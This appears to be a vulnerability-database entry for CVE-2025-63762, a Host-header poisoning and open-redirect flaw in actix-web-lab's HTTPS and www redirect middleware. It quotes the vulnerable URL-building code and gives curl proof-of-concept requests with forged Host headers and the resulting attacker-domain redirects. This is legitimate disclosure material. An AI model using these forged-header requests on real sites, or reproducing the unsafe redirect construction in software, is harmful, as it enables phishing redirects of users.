logo

Database

Uncontrolled external site redirect In actix-web-lab

Description

actix-web-lab has host header poisoning in redirect middleware can generate attacker-controlled absolute redirects

Summary

actix-web-lab redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, https://{hostname}{path}). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the Location response header, causing open redirect/phishing behavior.

CVE

Assigned CVE ID: CVE-2025-63762

Details

The issue is in redirect middleware paths that construct absolute URLs from req.connection_info():

    actix-web-lab/src/redirect_to_https.rs (around lines 119-132)

      let host = conn_info.host();

      format!("https://{hostname}{path}")

      format!("https://{hostname}:{port}{path}")

    actix-web-lab/src/redirect_to_www.rs (around lines 30-35)

      format!("{scheme}://www.{host}{path}")

    actix-web-lab/src/redirect_to_non_www.rs (around lines 30-34)

      format!("{scheme}://{host_no_www}{path}")

Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.

PoC

Environment used for validation:

    Local minimal Actix apps using actix-web-lab middleware

    RedirectHttps: http://127.0.0.1:18080

    redirect_to_www: http://127.0.0.1:18081

    redirect_to_non_www: http://127.0.0.1:18082

Reproduction (RedirectHttps):

curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test

Additional verification:

curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def

Reproduction (redirect_to_www):

curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello

Reproduction (redirect_to_non_www):

curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path

Impact

This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. GHSA-vhj5-x93p-67jw2. GCVE-GHSA-vhj5-x93p-67jw

References

1. https://github.com/robjtede/actix-web-lab/security/advisories/GHSA-vhj5-x93p-67jw2. https://github.com/robjtede/actix-web-lab/pull/2923. https://github.com/robjtede/actix-web-lab/commit/142c28b82eb59b67445a859a2a9b75e01a9964ee

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.